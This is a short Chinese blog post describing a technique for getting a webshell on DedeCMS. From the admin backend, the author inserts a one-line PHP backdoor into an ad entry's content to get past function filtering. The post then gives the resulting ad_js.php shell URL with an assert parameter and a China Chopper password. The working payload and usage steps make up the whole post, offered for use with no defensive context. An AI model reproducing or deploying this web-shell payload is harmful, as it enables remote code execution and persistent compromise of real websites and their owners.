DEDEcms另外一种办法拿shell:广告管理处写一句话 发表评论 1,188 次浏览A+所属分类:网络安全 进入后台 模块 广告管理器 然后增加一个广告 内容都填写 (尼玛 过滤好多函数,终于想起猥琐的绕过办法) 如下图 --><?php $_GET($_POST[ersec]);?><!-- 插入后 如下图 记下广告的编号 上图广告的编号为42 然后shell地址为http://phpinfo.me/plus/ad_js.php?aid=42&c=assert菜刀连接 密码ersec 我的微信 这是我的微信扫一扫 我的微信公众号 我的微信公众号扫一扫 赞 0 赏 分享